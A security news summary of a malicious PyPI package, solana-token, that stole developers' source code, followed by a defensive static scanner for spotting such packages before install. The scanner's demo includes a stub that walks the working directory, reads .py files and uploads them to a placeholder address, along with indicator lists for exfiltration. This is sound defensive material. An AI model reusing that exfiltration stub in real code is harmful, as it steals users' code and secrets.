Malicious PyPI Package Posing as Solana Tool Stole Source Code in 761 Downloads

Security researchers identified a malicious Python package, solana-token, on PyPI that was built to steal source code and secrets from developers working on blockchain projects. The package has been removed from PyPI, but not before it had been downloaded 761 times; the case is a further reminder of the supply chain risk facing cryptocurrency development.
Affected: Developers, Blockchain systems, Software supply chains

Keypoints

  • The malicious package solana-token was designed to exfiltrate source code and developer secrets from the machines it was installed on.
  • It was uploaded to the Python Package Index (PyPI) in early April 2024 and has since been removed.
  • It posed as a Solana-related blockchain utility, targeting developers building their own blockchain applications.
  • It attempted to read and copy every file it could reach in the Python execution environment, with the aim of harvesting cryptographic secrets embedded in developers' code.
  • How victims were led to the package is unknown; promotion on developer-focused platforms is the likely route.
  • The incident underlines the need to scrutinize third-party packages (their publisher, release history and install-time code) before adding them to a development environment.
  • Development teams should also monitor installed open-source and third-party software for suspicious behaviour, such as unexpected outbound connections, to catch supply chain compromises that get past review.
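The behaviour the keypoints describe (enumerate local source files, read them, send them to a remote endpoint) leaves a recognisable shape in the package's own code, and that shape can be checked statically before anything is installed. The script below is an added example written for this summary; it is not code from the article, from PyPI, or from the analysts who examined solana-token. Its indicator tables are assumptions (a starting point, not a published rule set), and the two sample modules it scans are constructed for the demonstration: the `setup_node` function and the `http://203.0.113.7/upload` endpoint (a documentation address range) are invented and do not reproduce the real package.

```python
"""Static pre-install triage for the pattern described above: read local source
files, then send them out.  Added example, not code from the article or from the
solana-token analysis; the indicator tables below are assumptions."""
import ast
import io
import re
import zipfile
from collections import namedtuple

Finding = namedtuple("Finding", "path line category detail")

NETWORK_MODULES = {"socket", "urllib.request", "http.client", "requests", "httpx"}
FS_ENUM_CALLS = {"os.walk", "os.listdir", "os.scandir", "glob.glob", "glob.iglob"}
INTROSPECTION_CALLS = {"inspect.stack", "inspect.currentframe", "sys._getframe"}
DYNAMIC_EXEC_CALLS = {"exec", "eval", "base64.b64decode", "marshal.loads"}
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

def _dotted(node):
    """Dotted name of a Name/Attribute chain such as os.path.join, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None

def scan_source(src, path):
    """Findings for one Python source file: imports, calls and string literals."""
    try:
        tree = ast.parse(src, filename=path)
    except SyntaxError as exc:
        return [Finding(path, exc.lineno or 0, "unparseable", str(exc))]
    out = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            out += [Finding(path, node.lineno, "network", a.name)
                    for a in node.names if a.name in NETWORK_MODULES]
        elif isinstance(node, ast.ImportFrom) and node.module:
            out += [Finding(path, node.lineno, "network", f"{node.module}.{a.name}")
                    for a in node.names
                    if node.module in NETWORK_MODULES
                    or f"{node.module}.{a.name}" in NETWORK_MODULES]
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in FS_ENUM_CALLS:
                out.append(Finding(path, node.lineno, "fs-enum", name))
            elif name in INTROSPECTION_CALLS:
                out.append(Finding(path, node.lineno, "introspection", name))
            elif name in DYNAMIC_EXEC_CALLS:
                out.append(Finding(path, node.lineno, "dynamic-exec", name))
            elif name == "open" and node.args and not isinstance(node.args[0], ast.Constant):
                # open() on a computed path: the shape of bulk reads over enumerated files
                out.append(Finding(path, node.lineno, "file-read", "open(<computed path>)"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IPV4.match(node.value) or node.value.startswith(("http://", "https://")):
                out.append(Finding(path, node.lineno, "endpoint", node.value))
    return out

def scan_package(wheel_bytes):
    """Scan every .py member of a wheel (a zip archive), read without installing."""
    out = []
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.endswith(".py"):
                out += scan_source(zf.read(info).decode("utf-8", "replace"), info.filename)
    return out

def verdict(findings):
    """Local file access combined with a network path is the exfiltration shape
    described above; any other finding means manual review; nothing means clean."""
    cats = {f.category for f in findings}
    if "network" in cats and cats & {"fs-enum", "file-read", "introspection"}:
        return "exfiltration-pattern"
    return "review" if cats else "clean"

# Constructed sample modules for the demo; neither is the real solana-token code.
MALICIOUS_STUB = '''
import os, urllib.request
def setup_node():
    blob = []
    for root, _, files in os.walk(os.getcwd()):
        for name in files:
            if name.endswith(".py"):
                with open(os.path.join(root, name), "rb") as fh:
                    blob.append(fh.read())
    # 203.0.113.0/24 is a documentation range, not a real endpoint.
    urllib.request.urlopen("http://203.0.113.7/upload", data=b"".join(blob))
'''
BENIGN_STUB = '''
import json
def load_config(path="config.json"):
    with open(path) as fh:
        return json.load(fh)
'''

def build_sample_wheel(modules):
    """Zip a {path: source} mapping in memory, laid out the way a wheel is."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, src in modules.items():
            zf.writestr(path, src)
    return buf.getvalue()
```

To use it on a real artifact, fetch the file without installing it (`pip download <name> --no-deps`) and pass its bytes to `scan_package`; an sdist is a tarball and needs the same loop over `tarfile`, which matters because its `setup.py` runs at install time and is a common place for a payload. The "review" verdict is deliberately noisy: the benign sample is flagged for reading a file, and the point of the tool is to surface the lines a human should read, not to block automatically.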

Read More: https://thehackernews.com/2025/05/malicious-pypi-package-posing-as-solana.html